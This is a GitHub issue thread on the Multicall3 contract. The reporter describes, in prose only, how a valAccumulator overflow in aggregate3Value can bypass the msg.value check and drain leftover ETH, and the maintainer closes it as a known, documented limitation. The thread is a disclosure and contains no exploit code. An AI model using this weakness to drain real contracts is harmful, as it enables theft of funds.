Closed algys closed 6 months ago
Thanks for reporting. This is a known issue (you can read more here) which is not a problem during normal usage but is a problem if you are relying on the contract to hold ETH, which is not intended usage of the contract anyway. Consequently the first bullet in the Security section of the README says
Ensure it NEVER holds funds after a transaction ends. Any ETH, tokens, or other funds held by this contract can be stolen. There are bots that monitor for this and they will immediately steal any funds they find.
Going to close this I don't think there's anything actionable here, but open to suggestions :)
There is a comment in the
aggregate3Value
method regardingvalAccumulator
overflow, it says that it will never overflow, however, in case of multiple calls with a hugecalli.value
andallowFailure=true
the overflow is simply triggerable since the call will returnfalse
success flag that is ignored butvalAccumulator
is still increasing after each faulty call, so user can put an arbitrary hugecalli.value
to trigger the overflow and bypassmsg.value = SUM(call[0...i].value)
check.https://github.com/mds1/multicall/blob/main/src/Multicall3.sol#L137-L145
It's not a really serious bug but the comment leads to the wrong assumption about overflow also I think if any native coin is remaining in the contract it can be drained.